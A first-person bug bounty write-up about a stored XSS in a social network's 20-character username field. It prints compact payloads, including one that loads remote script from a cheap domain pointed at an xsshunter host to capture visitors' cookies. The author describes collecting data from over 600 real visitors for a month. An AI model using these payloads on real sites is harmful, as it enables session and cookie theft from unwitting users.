How I paid 2$ for a 1054$ XSS bug + 20 chars blind XSS payloads
Hey there :)
This is my first write up, I decided to share this story because I spent nights on it and I finally found a solution to my problem.
The story :
I was invited some months ago to a private bugcrowd program that was going to start some days later.
I found some bugs and took a break.
During the last 5 days of the program I told myself I have to find some bugs before this program ends ( I want $$ boiiii) so I took another view of the program.
Checked the scope again etc…
This private program was a big social network (can’t tell the name it’s private bruh) but the point is I went to create a new account.
Username : I enter an XSS payload but no special character allowed : <:’();?> and the field was limited to 20 characters :
So I forgot about XSS and looked for another bugs.
Later I visited the 2nd in scope domain that was another social media, tried to create a new account using my email but I got an error : User already registered, please login. What happens ? Seems like the 2 sites use the same database so you could use the same account for the 2 sites.
So I logged in and moved to my profile and though I will try and edit my username here, I was surprised that there was not characters restricted :D
I was like :
But this field is limited to 20 chars too :(
I first entered a simple payload to confirm the XSS : <svg/onload=alert()> = 20 chars
I saved and visited my profile on the main site (I want it to work on the main site because the bounties here were higher). And boom alert box appear :D
Now that XSS is valid, time to work on a XSS payload to log cookies of who ever visits my profile, because remember : the higher the security impact is, the higher the bounty will be, thanks master yoda.
But the problem is, how to enter a valid 20 chars XSS payload to log cookies? the xsshunter tool is useful but way too long, so I started digging every night and after 48 hours I found this tweet with this short payload from @0x6D6172696F :
<script/src=//⑭.₨> = 18 chars (₨ here is Indian Rupee and is considered as 1 char instead of 2, same for the ⑭)
But it says only in MS Edge so I told myself I have nothing to lose so I entered this payload in Chrome and Firefox and boom. XSS triggers.
Now, I had to rent a (2 numbers).rs domain for the PoC, but the prices are quite high for me (90 usd approx), so I asked myself how can I reach the highest impact without spending 90 usd ?
After some days I had an idea, I directly went to namecheap.com (thanks to @brutelogic) to check the cheaper .2chars domain and found .pw, so I checked for RsRs.pw : It was 90 cents/year :D So the domain + dns = approx. 2.10$
I directly went to the panel and redirected rsrs.pw to my xsshunter link (name).xsshunter.com where my blind XSS payload is hosted, returned to the site and created this payload : <script src=//₨₨.pw> = 20 chars. Saved it and visited my profile, and boom :
Me, talking to myself :
After 1 month (till they fixed this) I got +600 victims without doing anything (kept receiving emails from xsshunter) and +1000$ bounty :)
I know this is long but I can’t resume 5 nights of work in 10 lines ^^
Take-away:
- When you see characters limitation or when a character is restricted somewhere, try to embed 2 chars into 1 or use the Greek dictionary to find a similar character.
- Sometimes you can go to an out of scope domain or lowest bounty domain to get a valid bug/high bounty bug
Thank you for reading,
Daher Mohamed aka m0m0x01d :)